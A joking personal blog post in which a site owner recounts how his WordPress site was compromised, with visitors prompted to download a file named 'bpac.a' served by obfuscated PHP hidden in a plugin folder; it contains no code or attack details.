So my site was hacked a while ago — it took a while to figure out how, because it was sneaky, and I was busy hunting bears in the outback.
Mildly interesting details follow.
I’m not sure how the code got on my site — suffice it to say, it got write privileges. Somebody probably sneezed on my Facebook page.
Anyway, here is how the thing manifested: the first time on any given day that I would visit any live page on this site, Google Chrome (my browser of choice) would ask me how I wanted to open a file with a name like “bpac.a” — and because Windows decided it was a RealAudio file, and that I should naturally play it with Windows Media Player (which I don’t have installed), the WMP install process would automatically begin.
I don’t know what was in the file; I never saved it or tried to open it, preferring instead to GET IT OFF GET IT OFF GET IT OFF.
I heard later from a visitor that it was a clip of an American football game. Clearly the work of communists.
The source code of the page in question looked completely normal. No weird <script> insertions, no <iframe>s, nothing out of the ordinary.
The script inserted a call to a php file which was buried in a legitimate plugin’s directory structure in my WordPress installation. The php file was full of the usual 100 solid lines of obfuscated code in the service of sports and other tools of the Devil.
I haven’t seen anything else about this online, so here you go, Internet. You can thank me later.
The “bpac” trojan series is apparently a documented Java exploit.